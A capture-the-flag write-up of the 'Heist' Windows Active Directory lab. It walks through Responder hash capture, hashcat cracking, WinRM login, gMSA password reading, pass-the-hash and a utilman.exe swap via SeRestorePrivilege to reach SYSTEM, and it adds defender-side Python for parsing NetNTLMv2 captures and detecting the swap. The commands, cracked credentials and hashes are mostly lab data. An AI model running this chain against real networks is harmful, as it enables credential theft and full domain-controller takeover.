# Heist

`active directory` `responder` `gmsapasswordreader` `serestoreprivilege`

* Machine name: Heist
* Difficulty: Hard
* OS: Windows AD

## Enumeration

### NMAP

```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-03 05:08 EDT
Nmap scan report for 192.168.196.165
Host is up (0.034s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-09-03 09:09:02Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: heist.offsec0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: heist.offsec0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-09-03T09:09:44+00:00; +2s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: HEIST
|   NetBIOS_Domain_Name: HEIST
|   NetBIOS_Computer_Name: DC01
|   DNS_Domain_Name: heist.offsec
|   DNS_Computer_Name: DC01.heist.offsec
|   DNS_Tree_Name: heist.offsec
|   Product_Version: 10.0.17763
|_  System_Time: 2024-09-03T09:09:04+00:00
| ssl-cert: Subject: commonName=DC01.heist.offsec
| Not valid before: 2024-08-01T02:27:33
|_Not valid after:  2025-01-31T02:27:33
8080/tcp open  http          Werkzeug httpd 2.0.1 (Python 3.9.0)
|_http-server-header: Werkzeug/2.0.1 Python/3.9.0
|_http-title: Super Secure Web Browser
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
```

### HTTP (8080)

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2F7Upvd8tOwwKGz2txlnyO%2Fda37272dc0ac99f08594f4c1172c9219.png?alt=media&#x26;token=eff6b439-1557-4e56-a854-dfd2356c17a2" alt=""><figcaption></figcaption></figure>

We will use Responder to capture an NTLMv2 hash: the web application on port 8080 is made to fetch a page from our listener, and the account it runs under authenticates to us over HTTP.

## Local exploitation

```
┌──(kali㉿kali)-[~]
└─$ sudo responder -I tun0

[HTTP] NTLMv2 Client   : 192.168.196.165
[HTTP] NTLMv2 Username : HEIST\enox
[HTTP] NTLMv2 Hash     : enox::HEIST:7de7b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
```

We will crack it with hashcat (mode 5600, NetNTLMv2).

```
┌──(kali㉿kali)-[~]
└─$ echo "enox::HEIST:7de7b95776227892:A51046D41C44ABD81DB64A88E8CB305A:0101000000000000AF7BC745E1FDDA019639D3C0D5DBF5CC0000000002000800490057004C004A0001001E00570049004E002D004D0037004E005A005700340037004E0053005300480004001400490057004C004A002E004C004F00430041004C0003003400570049004E002D004D0037004E005A005700340037004E005300530048002E00490057004C004A002E004C004F00430041004C0005001400490057004C004A002E004C004F00430041004C000800300030000000000000000000000000300000C4F51C6E9DB9499D59C386C317DB4FE1D9EF380289201E62A8474177A8845FCE0A001000000000000000000000000000000000000900260048005400540050002F003100390032002E003100360038002E00340035002E003200330037000000000000000000" > hash.txt
                                                                
┌──(kali㉿kali)-[~]
└─$ hashcat -h | grep NT
   5500 | NetNTLMv1 / NetNTLMv1+ESS                                  | Network Protocol
  27000 | NetNTLMv1 / NetNTLMv1+ESS (NT)                             | Network Protocol
   5600 | NetNTLMv2                                                  | Network Protocol
  27100 | NetNTLMv2 (NT)                                             | Network Protocol
   1000 | NTLM                                                       | Operating System
                                                                
┌──(kali㉿kali)-[~]
└─$ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 5.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 16.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-sandybridge-11th Gen Intel(R) Core(TM) i7-11700F @ 2.50GHz, 7852/15768 MB (2048 MB allocatable), 5MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

ENOX::HEIST:7de7b95776227892:a51046d41c44abd81db64a88e8cb305a:0101000000000000af7bc745e1fdda019639d3c0d5dbf5cc0000000002000800490057004c004a0001001e00570049004e002d004d0037004e005a005700340037004e0053005300480004001400490057004c004a002e004c004f00430041004c0003003400570049004e002d004d0037004e005a005700340037004e005300530048002e00490057004c004a002e004c004f00430041004c0005001400490057004c004a002e004c004f00430041004c000800300030000000000000000000000000300000c4f51c6e9db9499d59c386c317db4fe1d9ef380289201e62a8474177a8845fce0a001000000000000000000000000000000000000900260048005400540050002f003100390032002e003100360038002e00340035002e003200330037000000000000000000:california
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: ENOX::HEIST:7de7b95776227892:a51046d41c44abd81db64a...000000
Time.Started.....: Tue Sep  3 05:13:37 2024 (0 secs)
Time.Estimated...: Tue Sep  3 05:13:37 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1359.5 kH/s (1.79ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 5120/14344385 (0.04%)
Rejected.........: 0/5120 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> babygrl
Hardware.Mon.#1..: Util: 18%

Started: Tue Sep  3 05:13:36 2024
Stopped: Tue Sep  3 05:13:39 2024
```

`enox:california`
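Before moving on, it is worth looking at what Responder actually captured. The following Python is an added analyst-side example (not part of the original write-up and not Responder's or hashcat's code): it parses the NetNTLMv2 line printed above into its fields and decodes the AV pairs inside the client blob. Two of them matter to a defender: MsvAvTargetName records the SPN the client believed it was authenticating to (here an HTTP SPN for a bare IP address, the attacker's listener), and MsvAvChannelBindings being all zero shows that no channel binding (EPA) protected the exchange. The hash string is the one shown on this page; nothing here attempts to crack it.

```python
import re
import struct
from datetime import datetime, timedelta, timezone

# NetNTLMv2 line captured by Responder above (from the original page), in the
# user::domain:server_challenge:NTProofStr:blob layout that hashcat -m 5600 expects.
CAPTURED = (
    "enox::HEIST:7de7b95776227892:A51046D41C44ABD81DB64A88E8CB305A:"
    "0101000000000000AF7BC745E1FDDA019639D3C0D5DBF5CC00000000"
    "02000800490057004C004A00"
    "01001E00570049004E002D004D0037004E005A005700340037004E00530053004800"
    "04001400490057004C004A002E004C004F00430041004C00"
    "03003400570049004E002D004D0037004E005A005700340037004E005300530048002E00"
    "490057004C004A002E004C004F00430041004C00"
    "05001400490057004C004A002E004C004F00430041004C00"
    "08003000" "30000000" "00000000" "00000000" "00300000"
    "C4F51C6E9DB9499D59C386C317DB4FE1D9EF380289201E62A8474177A8845FCE"
    "0A001000" "00000000000000000000000000000000"
    "0900260048005400540050002F003100390032002E003100360038002E00340035002E00320033003700"
    "00000000" "00000000"
)

# AV pair identifiers from MS-NLMP section 2.2.2.1.
AV_NAMES = {
    0: "MsvAvEOL", 1: "MsvAvNbComputerName", 2: "MsvAvNbDomainName",
    3: "MsvAvDnsComputerName", 4: "MsvAvDnsDomainName", 5: "MsvAvDnsTreeName",
    6: "MsvAvFlags", 7: "MsvAvTimestamp", 8: "MsvAvSingleHost",
    9: "MsvAvTargetName", 10: "MsvAvChannelBindings",
}
UNICODE_AV_IDS = {1, 2, 3, 4, 5, 9}  # values stored as UTF-16LE strings


def filetime_to_datetime(filetime):
    """Convert a Windows FILETIME (100 ns ticks since 1601-01-01 UTC) to a datetime."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=filetime // 10)


def parse_av_pairs(data):
    """Walk the AvId/AvLen/Value list until the MsvAvEOL terminator."""
    pairs = {}
    offset = 0
    while offset + 4 <= len(data):
        av_id, av_len = struct.unpack_from("<HH", data, offset)
        offset += 4
        if av_id == 0:
            break
        value = data[offset:offset + av_len]
        offset += av_len
        name = AV_NAMES.get(av_id, f"MsvAvUnknown_{av_id}")
        pairs[name] = value.decode("utf-16-le") if av_id in UNICODE_AV_IDS else value.hex()
    return pairs


def parse_netntlmv2(line):
    """Split a Responder/hashcat-style NetNTLMv2 line and decode the client challenge blob."""
    user, _, domain, server_challenge, nt_proof, blob_hex = line.strip().split(":")
    blob = bytes.fromhex(blob_hex)
    if blob[0] != 1 or blob[1] != 1:          # RespType / HiRespType must both be 1
        raise ValueError("not an NTLMv2 client challenge blob")
    timestamp = struct.unpack_from("<Q", blob, 8)[0]   # bytes 8..15, little-endian FILETIME
    return {
        "user": user,
        "domain": domain,
        "server_challenge": server_challenge.lower(),
        "nt_proof": nt_proof.lower(),
        "timestamp": filetime_to_datetime(timestamp),
        "client_challenge": blob[16:24].hex(),
        "av_pairs": parse_av_pairs(blob[28:]),        # 4 reserved bytes precede the AV list
    }


def analyst_findings(parsed):
    """Flag the two properties of this capture that a defender would want to know about."""
    findings = []
    av = parsed["av_pairs"]
    target_host = av.get("MsvAvTargetName", "").split("/", 1)[-1]
    if re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", target_host):
        findings.append("ip_literal_spn")        # client authenticated to a bare IP, not a domain host
    if av.get("MsvAvChannelBindings", "") == "00" * 16:
        findings.append("no_channel_binding")    # no EPA/TLS channel binding in the response
    return findings


if __name__ == "__main__":
    result = parse_netntlmv2(CAPTURED)
    print(f"{result['domain']}\\{result['user']} at {result['timestamp'].isoformat()}")
    for name, value in result["av_pairs"].items():
        print(f"  {name:22s} {value}")
    print("findings:", analyst_findings(result))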

```
┌──(kali㉿kali)-[~/oscp/heist]
└─$ crackmapexec winrm 192.168.196.165 -u user.txt -p pass.txt
SMB         192.168.196.165 5985   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:heist.offsec)
HTTP        192.168.196.165 5985   DC01             [*] http://192.168.196.165:5985/wsman
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       192.168.196.165 5985   DC01             [+] heist.offsec\enox:california (Pwn3d!)
```

```
┌──(kali㉿kali)-[~/oscp/heist]
└─$ evil-winrm -i 192.168.196.165 -u enox -p california
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\enox\Documents> whoami
heist\enox
```

## Privilege escalation

We will try to become svc\_apache$. First we collect the domain with bloodhound-python.

```
┌──(kali㉿kali)-[~/oscp/heist]
└─$ bloodhound-python -d heist.offsec -u enox -p california -c all -ns 192.168.196.165
INFO: Found AD domain: heist.offsec
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc01.heist.offsec:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc01.heist.offsec
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.heist.offsec
INFO: Found 6 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.heist.offsec
INFO: Done in 00M 07S

```

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FpQTV6EVSvOvFOeXefDiF%2Fb3854540469af5357723f92085604f48.png?alt=media&#x26;token=10fc3fb2-2037-4123-bf40-8482dbd7bcb7" alt=""><figcaption></figcaption></figure>

In "Shortest Paths to High Value Targets", the user enox belongs to the Web Admin group, and that group has an edge to svc\_apache$.

Right-click the edge (arrow) to see how it can be abused.

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FhZ69PaebVA1iZDfXunHP%2Fd43aee08b2c692eef3d0b2f8d19a3752.png?alt=media&#x26;token=9b4c9070-4c9a-44d5-8ac4-9b52d87d5636" alt=""><figcaption></figcaption></figure>

```
*Evil-WinRM* PS C:\Users\enox\desktop\application> ./gmsapasswordreader.exe --accountname svc_apache$
Calculating hashes for Old Value
[*] Input username             : svc_apache$
[*] Input domain               : HEIST.OFFSEC
[*] Salt                       : HEIST.OFFSECsvc_apache$
[*]       rc4_hmac             : 4FC1682833B24CF2225248D67DF7E618
[*]       aes128_cts_hmac_sha1 : 056248716EB814ECEEA9BEF3EC864606
[*]       aes256_cts_hmac_sha1 : E5BCF79903496F24EA9D753F1EFC3146701B6ADF88A00B03E9EE73483DD73984
[*]       des_cbc_md5          : 4AB398EFD91523CE

Calculating hashes for Current Value
[*] Input username             : svc_apache$
[*] Input domain               : HEIST.OFFSEC
[*] Salt                       : HEIST.OFFSECsvc_apache$
[*]       rc4_hmac             : 31424E5B49C147E64854B47E50AA4C98
[*]       aes128_cts_hmac_sha1 : 409F1002404B512AC58B4BEB22013568
[*]       aes256_cts_hmac_sha1 : F133616850B2F938715388DFD581398A58C9AF9B45F329710A278EE3E9074395
[*]       des_cbc_md5          : 7564AE6407BADCC4

```

The rc4\_hmac value is the one we need here: for a gMSA it is the account's NT hash, so it can be used directly with pass-the-hash.

```
┌──(kali㉿kali)-[~/oscp/heist]
└─$ evil-winrm -i 192.168.196.165 -u svc_apache$ -H '4FC1682833B24CF2225248D67DF7E618'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_apache$\Documents>
```

We are now connected as svc\_apache$.

```
*Evil-WinRM* PS C:\users\svc_apache$\documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

```

`SeRestorePrivilege` is interesting, an intuition confirmed by the contents of the Documents folder, which holds a script to enable it.

We run the PowerShell script, which enables the privilege in the current process token:

```
*Evil-WinRM* PS C:\users\svc_apache$\documents> ./EnableSeRestorePrivilege.ps1
Debug:
	using System;
	using System.Diagnostics;
	using System.Runtime.InteropServices;
	using System.Security.Principal;

	[StructLayout(LayoutKind.Sequential, Pack = 1)]
	public struct TokPriv1Luid
	{
		public int Count;
		public long Luid;
		public int Attr;
	}

	public static class Advapi32
	{
		[DllImport("advapi32.dll", SetLastError=true)]
		public static extern bool OpenProcessToken(
			IntPtr ProcessHandle,
			int DesiredAccess,
			ref IntPtr TokenHandle);

		[DllImport("advapi32.dll", SetLastError=true)]
		public static extern bool LookupPrivilegeValue(
			string lpSystemName,
			string lpName,
			ref long lpLuid);

		[DllImport("advapi32.dll", SetLastError = true)]
		public static extern bool AdjustTokenPrivileges(
			IntPtr TokenHandle,
			bool DisableAllPrivileges,
			ref TokPriv1Luid NewState,
			int BufferLength,
			IntPtr PreviousState,
			IntPtr ReturnLength);

	}

	public static class Kernel32
	{
		[DllImport("kernel32.dll")]
		public static extern uint GetLastError();
	}
Debug: Current process handle: 1620
Debug: Calling OpenProcessToken()
Debug: Token handle: 2652
Debug: Calling LookupPrivilegeValue for SeRestorePrivilege
Debug: SeRestorePrivilege LUID value: 18
Debug: Calling AdjustTokenPrivileges
Debug: GetLastError returned: 0
```

Now we can exploit it. SeRestorePrivilege lets us write anywhere under System32 regardless of the file ACLs, so we swap utilman.exe for cmd.exe, the technique listed in Priv2Admin.

{% embed url="<https://github.com/gtworek/Priv2Admin>" %}

```
*Evil-WinRM* PS C:\Users\svc_apache$\Documents> mv C:\Windows\System32\utilman.exe C:\Windows\System32\utilman.old
*Evil-WinRM* PS C:\Users\svc_apache$\Documents> mv C:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe
```

```
┌──(kali㉿kali)-[~/oscp/heist]
└─$ rdesktop 192.168.196.165
```

Press Win + U on the RDP logon screen: the Ease of Access button now launches our cmd.exe as SYSTEM.

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2F5A0C8iqD8GQBQWGTPseI%2F428cf4010a11a78c8623fd2001b0e489.png?alt=media&#x26;token=ea456073-04d3-49a9-aa27-88a2c53d081a" alt=""><figcaption></figcaption></figure>

We are NT AUTHORITY\SYSTEM!
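From the defender's side, the chain above leaves two observable artefacts: a token privilege being enabled (Windows Security event 4703, "A user right was adjusted", which lists SeRestorePrivilege in its EnabledPrivilegeList), followed by a rename or write to an accessibility binary under System32 (Sysmon event 11 FileCreate or Security event 4663 object access, depending on what is collected). The Python below is an added example, not part of the original write-up: it correlates the two over a short window and rates a lone accessibility-binary change lower than one preceded by a SeRestorePrivilege enablement by the same account. The events are constructed samples in a simplified, assumed record shape (not a real log export), and the field names are placeholders for whatever the SIEM normalises to.

```python
from datetime import datetime, timedelta

# Accessibility helpers the Windows logon screen launches as SYSTEM (MITRE T1546.008 targets).
ACCESSIBILITY_BINARIES = {
    "utilman.exe", "sethc.exe", "osk.exe", "narrator.exe",
    "magnify.exe", "displayswitch.exe", "atbroker.exe",
}
SYSTEM32 = "c:\\windows\\system32\\"

# Constructed sample events (assumed simplified shape; not a real export).
# event_id 4703 = "A user right was adjusted"; 4663 / 11 = file access / file create.
SAMPLE_EVENTS = [
    {"time": "2024-09-03T09:40:01Z", "event_id": 4703, "user": "HEIST\\svc_apache$", "pid": 1620,
     "enabled": ["SeRestorePrivilege"], "disabled": []},
    {"time": "2024-09-03T09:40:30Z", "event_id": 4663, "user": "HEIST\\svc_apache$", "pid": 1620,
     "target": "C:\\Windows\\System32\\utilman.old"},
    {"time": "2024-09-03T09:40:31Z", "event_id": 4663, "user": "HEIST\\svc_apache$", "pid": 1620,
     "target": "C:\\Windows\\System32\\utilman.exe"},
    {"time": "2024-09-03T09:45:00Z", "event_id": 4703, "user": "NT AUTHORITY\\SYSTEM", "pid": 4,
     "enabled": ["SeBackupPrivilege"], "disabled": []},          # benign: other privilege, other account
    {"time": "2024-09-03T09:50:00Z", "event_id": 11, "user": "HEIST\\enox", "pid": 2200,
     "target": "C:\\Users\\enox\\Documents\\notes.txt"},        # benign: user profile, not System32
    {"time": "2024-09-03T10:05:00Z", "event_id": 11, "user": "HEIST\\Administrator", "pid": 3100,
     "target": "C:\\Windows\\System32\\sethc.exe"},             # suspicious, but no prior 4703
]


def _ts(value):
    """Parse the ISO-8601 UTC timestamp used in the sample records."""
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def touches_accessibility_binary(path):
    """True for a System32 path whose file name (or stem, to catch utilman.old) is an accessibility helper."""
    lowered = path.lower()
    if not lowered.startswith(SYSTEM32):
        return False
    name = lowered.rsplit("\\", 1)[-1]
    stem = name.rsplit(".", 1)[0]
    return name in ACCESSIBILITY_BINARIES or stem + ".exe" in ACCESSIBILITY_BINARIES


def correlate(events, window=timedelta(minutes=15)):
    """Pair accessibility-binary file events with a preceding SeRestorePrivilege enablement by the same user."""
    alerts = []
    restore_enables = []  # (time, user, pid) of each SeRestorePrivilege enablement seen so far
    for ev in sorted(events, key=lambda e: e["time"]):
        when = _ts(ev["time"])
        if ev["event_id"] == 4703 and "SeRestorePrivilege" in ev.get("enabled", []):
            restore_enables.append((when, ev["user"], ev["pid"]))
            continue
        if ev["event_id"] in (11, 4663) and touches_accessibility_binary(ev["target"]):
            prior = [r for r in restore_enables
                     if r[1] == ev["user"] and timedelta(0) <= when - r[0] <= window]
            alerts.append({
                "time": ev["time"],
                "user": ev["user"],
                "target": ev["target"],
                "severity": "high" if prior else "medium",
                "reason": ("accessibility binary changed after SeRestorePrivilege was enabled"
                           if prior else "accessibility binary changed"),
            })
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(f"[{alert['severity']:6s}] {alert['time']} {alert['user']} -> {alert['target']}: {alert['reason']}")
```

The medium-severity branch matters as much as the high one: a copy of cmd.exe landing on sethc.exe or utilman.exe is worth a ticket on its own, and the 4703 correlation only raises the priority. Beyond detection, the privilege itself is the fix: SeRestorePrivilege on a service account such as svc_apache$ has no business being granted, and the gMSA's msDS-GroupMSAMembership should not include a broad group like Web Admin.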
